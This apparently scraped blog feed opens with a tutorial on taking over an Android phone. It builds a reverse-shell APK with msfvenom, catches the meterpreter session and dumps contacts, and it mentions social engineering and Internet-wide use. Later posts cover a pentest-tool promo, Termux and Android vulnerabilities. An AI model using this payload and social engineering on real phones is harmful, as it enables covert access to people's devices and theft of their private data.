In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing.

Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.

We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.

Step by step Tutorial

Generating a Payload with msfvenom

At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.

After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:

# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk

Where:

• -p indicates a payload type
• android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
• LHOST is your local IP
• LPORT is set to be as a listening port
• R> /var/www/html would give the output directly on apache server
• apk is the final name of the final output

This would take some time to generate an apk file of almost ten thousand bytes.

Launching an Attack

Before launching attack, we need to check the status of the apache server. Type command:

# service apache2 status

All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.

In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.

After downloading it successfully, select the app to install.

So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.

Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.

Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.

Post Exploitation

Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.

You can interact with any session by typing sessions -i [session ID]

After entering the session, type “help” to list down all the commands we can put forward in this session.

You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.

You will also find some network commands including portfwd and route

Some powerful system commands to get user ID, get a shell or getting the complete system information.

Type “app_list” and it will show you all the installed apps on the device

We also have the power to uninstall any app from the Android device

Extracting Contacts from an Android Device

Now let extract some contacts from the target device by typing “dump” and double tab

It will show all the options to extract from the device. Type “dump_contacts” and enter

It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”

This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.

There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.

A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

The post How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux appeared first on Tech Chronicles.

Why is Android so powerful?

ANDRAX promotes the use of more than 900 advanced tools for Hacking, Cracking and Penetration Testing.

Screenshots

More info in the official site.

The post ANDRAX v4 DragonFly – Penetration Testing on Android appeared first on Tech Chronicles.

Android is a capable operating system, as it offers many apps that approach desktop class. Yet sometimes, it takes a fair bit of effort to accomplish something on Android that would be a snap on a desktop.

One solution is to take advantage of Android’s hidden Linux infrastructure. The Termux app provides a command line environment and allows you to install honest-to-goodness Linux apps on your Android device. Here’s how to use the Termux app.

Why Use Termux?

There are already some apps in the Play Store that are Android ports of Linux applications. These differ from Termux in that they replicate those Linux apps, but they’re made in an “Android way.”

In contrast, Termux is a self-contained Linux environment. Its programs are (for all intents and purposes) the same as their Linux counterparts. This conveys some advantages over the ported applications:

• Consistency: Linux apps that have been ported to Android require a user interface of some kind. The user experience on Android largely depends on how much effort the developer puts into it. Conversely, Termux apps are the same as the Linux versions, from keyboard shortcuts to how you install them.
• Compactness: The addition of Android code can cause some slim applications to become heavy. For example, an Android SSH client might be anywhere from 2MB to 12MB in size. Compare this to Dropbear, available in Termux, which weighs in at 396KB (that’s kilobytes) installed. And it provides an SSH server too.

• Timeliness: When an application receives an update, you remain at the mercy of the Android app’s developer for an upgrade. In contrast, Termux applications are standard Linux packages that require less maintenance. They may even be created automatically alongside the desktop versions. You’re likely to get access to new features more quickly with Termux.
• Price: There is a chance any app you purchase from the Play Store will have a charge associated with it. All the apps in Termux are free (and open source), as is Termux itself.

How to Use Termux

Before diving in, understand that Termux is primarily a command line environment. There’s no fancy user interface with shiny buttons here. This goes not only for the base Termux package, but its apps as well. You won’t get the newest version of LibreOffice with this method.

Most importantly, you must be comfortable with the command line in order to install and use these programs on Termux. To develop some familiarity, check our list of the most-used Linux Terminal commands.

40+ Most Used Linux Terminal Commands 40+ Most Used Linux Terminal Commands Whether you’re just getting started or simply curious about the Linux terminal, here are the most common commands that will carry you through your entire time on Linux. Read More

When you’re ready, grab your phone or tablet and install Termux.

Download: Termux (Free)

Basic Termux Commands You Should Know

Launching Termux will drop you straight into a command line environment. From here, you can install new tools. Termux uses the same package installer as found in Debian, Ubuntu, and related Linux distros.

Advanced Packaging Tools (more commonly referred to as APT) is used to find, install, and remove software in Termux. Start off by updating packages and upgrading with these commands:

apt update

apt upgrade

Next, find out what apps are available:

apt list

To find out more about one of these packages, use

apt show [package name]

This will display the name, maintainer, file size, dependencies, and other useful details. To install an app, simply use:

apt install [package name]

Our guide to using APT will tell you more about this tool, such as how to upgrade packages. You can run an installed tool by entering its name at the Terminal prompt in the Termux command line.

A Beginner’s Guide to Installing Software in Ubuntu with APT A Beginner’s Guide to Installing Software in Ubuntu with APT If you’ve used Ubuntu you have probably used the apt command at some point. But did you know there’s so much more to it than apt-get install and apt-get upgrade? Read More

In addition to apt, this list of built-in commands works in Termux on Android:

• cp lets you copy a file
• mv will move a file
• ls lists the contents of a directory
• rm deletes (removes) data
• ln creates a symbolic link (for example, ln /data/data/com.termux/files/home/documents to /sdcard/Documents)

With these built-in tools, you reduce the need for an Android file manager. They also save you from having to root your phone to enjoy such functionality.

Linux Apps You Can Install With the Termux Command Line

Using apt with Termux, you can install several useful Linux apps on Android. These fall into several categories—let’s look at some of the highlights.

Text Editors

Termux provides recent versions of both popular Linux text editors: VIM and Emacs. Other editors, such as the minimalist nano, are also available.

Of course, Android has a lot of text editors already. So what do Emacs and Vim bring to the platform? Well, if you like to work in Markdown, both support it well. Into the “distraction-free” mindset? It doesn’t get much more distraction-free than VIM.

Need something to take notes and provide to-dos? Org-mode in Emacs has you covered. You can even use Emacs as your file manager, screenwriting app, Trello client, music player, or to play Minesweeper.

Why switch? Android text editors tend to focus on one standout feature. For example, one may focus on distraction-free drafting, another can preview Markdown and other formatting, and still others might be built on keeping notes (though they’re really just text editors at their core).

Terminal-based editors can fulfill these needs in a single program, while also being available on desktop platforms.

Termux Command Line Utilities

Termux packages include several useful Linux command line utilities:

• gnuplot: A mathematical graphing program
• ImageMagick: An image manipulation and conversion toolkit
• p7zip: An archiving utility for the 7-Zip compression scheme
• UnRAR: A different archive tool for the RAR format
• Wget: A program to fetch files over the internet via HTTP or FTP

Why switch? These are dedicated programs with a lot to offer.

Install Servers in Termux

We’ve already shown how you can turn your Android device into a web server with specific apps. Termux similarly provides genuine Linux web servers like Apache, nginx, and Lighttpd.

How to Turn an Android Device Into a Web Server How to Turn an Android Device Into a Web Server Want to host a simple website without an expensive hosting plan? Here’s how to host a website on your Android phone or tablet. Read More

But why would you want to run a web server on your Android device?

In addition to programming, bear in mind that many of today’s best applications are web apps. For example, you could install nginx, the PostgreSQL database, and Python, then use the Taiga project management platform. This is a lot of utility, all without having to sign up for any third-party services or hosting.

Termux also includes Dropbear, which provides an SSH server (and client) to log into your phone/tablet and transfer files. This is useful in situations where you want to exchange a few files but don’t want to use cloud services. Simply start up the Dropbear server, use an SSH client to grab what you need, and shut it down.

Why switch? Apps like Tiny Web Server allow you to spin up a web server. But what’s more intriguing than having a lightweight server you can start from the command line?

Development Apps in the Termux Command Line

While many Android apps (listed as “code editors”) provide the ability to write code, they may not provide the languages themselves. With Termux, you can test your code on your phone or tablet.

It offers standard distributions of programming languages such as:

• BASH shell (the default available out of the box, and a great way to get started hacking around)
• Python (both v2 and v3 are available)
• PHP
• Ruby

Source control systems git and Subversion are also available, which have their uses beyond just development. If you like being in control of your own data, source control lets you stash your files wherever you want. You also control when you send updates to other devices, and can use “tags” to label versions.

Why switch? There are some programming language packages for Android, such QPython. But these provide their own bulky UIs. They may also require additional apps to be fully useful.

Android-based apps are available for both git and svn. However, you need to have a separate app for each source control type. Termux provides both in the same package for free. By going with source control, you can also cut down on clients for cloud syncing services such as Dropbox.

Add Linux to Android With Termux Commands

Termux is a super-compact offering that opens a lot of functionality for your Android device. The command line is one of the most powerful features of Linux, and Termux builds on your device’s Linux kernel to make you more efficient on the go.

And who knows, maybe dabbling with these apps will convince you to try Linux on the desktop as well.

The post How to Use the Linux Command Line on Android With Termux appeared first on Tech Chronicles.

The dozens of flaws across 29 Android smartphone makers show just how insecure the devices can be, even brand-new.

When you buy an Android smartphone, it’s rarely pure Android. Manufacturers squeeze in their own apps or give it a fresh coat of interface. Carriers do it too. The resulting stew of preinstalled software and vanilla Android sometimes turns out to be rancid, putting flaws and vulnerabilities on the phone before you even take it out of the box. For proof of how bad it is, look no further than the 146 vulnerabilities—across 29 Android smartphone makers—that have just been simultaneously revealed.

The post 146 New Vulnerabilities All Come Preinstalled on Android Phones appeared first on Tech Chronicles.